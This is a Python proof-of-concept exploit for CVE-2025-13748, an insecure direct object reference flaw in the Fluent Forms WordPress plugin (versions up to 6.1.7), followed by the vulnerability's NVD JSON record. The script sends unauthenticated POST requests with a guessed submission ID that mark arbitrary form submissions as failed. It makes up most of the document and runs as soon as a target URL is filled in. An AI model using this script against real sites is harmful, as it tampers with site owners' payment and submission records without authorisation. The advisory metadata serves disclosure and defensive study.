CVE-2025-13748

import requests # CVE-2025-13748 PoC - Fluent Forms IDOR Vulnerability # Target: WordPress site with Fluent Forms plugin <= 6.1.7 TARGET_URL = "https://target-site.com/" SUBMISSION_ID = "12345" # Enumerated or guessed submission ID def exploit_idor(): """ Exploit IDOR vulnerability in Fluent Forms Stripe payment processing This allows unauthenticated attackers to mark arbitrary submissions as failed """ # Construct the vulnerable endpoint endpoint = f"{TARGET_URL}?fluentform_payment_confirm=1" # Malicious request to mark submission as failed payload = { 'submission_id': SUBMISSION_ID, 'status': 'failed', 'action': 'confirmScaPayment' } try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully for submission_id: {SUBMISSION_ID}") print(f"[*] Status code: {response.status_code}") print(f"[*] Response: {response.text[:200]}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("CVE-2025-13748 - Fluent Forms IDOR PoC") print("=" * 50) exploit_idor()

{"cve": {"id": "CVE-2025-13748", "sourceIdentifier": "[email protected]", "published": "2025-12-06T07:15:48.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.1.7 via the 'submission_id' parameter due to missing validation on a user controlled key within the confirmScaPayment() function. This makes it possible for unauthenticated attackers to mark arbitrary submissions as failed via crafted requests to the endpoint granted they can guess or enumerate a valid submission identifier."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Payments/PaymentMethods/Stripe/StripeInlineProcessor.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2aee799-4e4c-4a41-8b76-e2ad576fe2e2?source=cve", "source": "[email protected]"}]}}